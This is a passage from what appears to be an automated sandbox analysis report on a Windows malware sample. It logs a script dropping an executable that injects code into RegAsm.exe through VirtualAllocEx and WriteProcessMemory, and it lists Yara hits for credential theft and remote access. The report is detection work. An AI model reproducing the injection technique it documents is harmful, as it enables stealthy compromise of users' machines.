Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov ecx, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7035C mov eax, dword ptr fs:[00000030h] 10_2_02F7035C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5341 mov eax, dword ptr fs:[00000030h] 10_2_02FC5341
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9353 mov eax, dword ptr fs:[00000030h] 10_2_02EE9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE9353 mov eax, dword ptr fs:[00000030h] 10_2_02EE9353
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F72349 mov eax, dword ptr fs:[00000030h] 10_2_02F72349
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB132D mov eax, dword ptr fs:[00000030h] 10_2_02FB132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB132D mov eax, dword ptr fs:[00000030h] 10_2_02FB132D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1F32A mov eax, dword ptr fs:[00000030h] 10_2_02F1F32A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EE7330 mov eax, dword ptr fs:[00000030h] 10_2_02EE7330
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F10310 mov ecx, dword ptr fs:[00000030h] 10_2_02F10310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A30B mov eax, dword ptr fs:[00000030h] 10_2_02F2A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A30B mov eax, dword ptr fs:[00000030h] 10_2_02F2A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2A30B mov eax, dword ptr fs:[00000030h] 10_2_02F2A30B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7930B mov eax, dword ptr fs:[00000030h] 10_2_02F7930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7930B mov eax, dword ptr fs:[00000030h] 10_2_02F7930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7930B mov eax, dword ptr fs:[00000030h] 10_2_02F7930B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEC310 mov ecx, dword ptr fs:[00000030h] 10_2_02EEC310
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F320F0 mov ecx, dword ptr fs:[00000030h] 10_2_02F320F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF80E9 mov eax, dword ptr fs:[00000030h] 10_2_02EF80E9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEA0E3 mov ecx, dword ptr fs:[00000030h] 10_2_02EEA0E3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F150E4 mov eax, dword ptr fs:[00000030h] 10_2_02F150E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F150E4 mov ecx, dword ptr fs:[00000030h] 10_2_02F150E4
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F760E0 mov eax, dword ptr fs:[00000030h] 10_2_02F760E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEC0F0 mov eax, dword ptr fs:[00000030h] 10_2_02EEC0F0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC50D9 mov eax, dword ptr fs:[00000030h] 10_2_02FC50D9
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F720DE mov eax, dword ptr fs:[00000030h] 10_2_02F720DE
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F190DB mov eax, dword ptr fs:[00000030h] 10_2_02F190DB
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov ecx, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F070C0 mov eax, dword ptr fs:[00000030h] 10_2_02F070C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D0C0 mov eax, dword ptr fs:[00000030h] 10_2_02F6D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D0C0 mov eax, dword ptr fs:[00000030h] 10_2_02F6D0C0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB60B8 mov eax, dword ptr fs:[00000030h] 10_2_02FB60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB60B8 mov ecx, dword ptr fs:[00000030h] 10_2_02FB60B8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F880A8 mov eax, dword ptr fs:[00000030h] 10_2_02F880A8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1D090 mov eax, dword ptr fs:[00000030h] 10_2_02F1D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1D090 mov eax, dword ptr fs:[00000030h] 10_2_02F1D090
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EED08D mov eax, dword ptr fs:[00000030h] 10_2_02EED08D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF208A mov eax, dword ptr fs:[00000030h] 10_2_02EF208A
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F2909C mov eax, dword ptr fs:[00000030h] 10_2_02F2909C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7D080 mov eax, dword ptr fs:[00000030h] 10_2_02F7D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7D080 mov eax, dword ptr fs:[00000030h] 10_2_02F7D080
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF5096 mov eax, dword ptr fs:[00000030h] 10_2_02EF5096
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov ecx, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F01070 mov eax, dword ptr fs:[00000030h] 10_2_02F01070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1C073 mov eax, dword ptr fs:[00000030h] 10_2_02F1C073
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F6D070 mov ecx, dword ptr fs:[00000030h] 10_2_02F6D070
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F7106E mov eax, dword ptr fs:[00000030h] 10_2_02F7106E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FC5060 mov eax, dword ptr fs:[00000030h] 10_2_02FC5060
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F1B052 mov eax, dword ptr fs:[00000030h] 10_2_02F1B052
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9705E mov ebx, dword ptr fs:[00000030h] 10_2_02F9705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F9705E mov eax, dword ptr fs:[00000030h] 10_2_02F9705E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02F76050 mov eax, dword ptr fs:[00000030h] 10_2_02F76050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EF2050 mov eax, dword ptr fs:[00000030h] 10_2_02EF2050
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h] 10_2_02FB903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h] 10_2_02FB903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h] 10_2_02FB903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02FB903E mov eax, dword ptr fs:[00000030h] 10_2_02FB903E
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Code function: 10_2_02EEA020 mov eax, dword ptr fs:[00000030h] 10_2_02EEA020
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\wscript.exe File created: temp_executable.exe.0.dr Jump to dropped file
Source: temp_executable.exe.0.dr, ProcessExecutor.cs Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
Source: temp_executable.exe.0.dr, ProcessExecutor.cs Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 401000 Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: CE3008 Jump to behavior
Source: C:\Windows\System32\wscript.exe Process created: C:\Users\user\AppData\Local\Temp\temp_executable.exe "C:\Users\user~1\AppData\Local\Temp\temp_executable.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe" Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\temp_executable.exe Queries volume information: C:\Users\user\AppData\Local\Temp\temp_executable.exe VolumeInformation Jump to behavior
Source: C:\Windows\System32\wscript.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information

Source: Yara match File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match File source: 10.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000000A.00000002.1842189072.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.1842383529.0000000000FA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY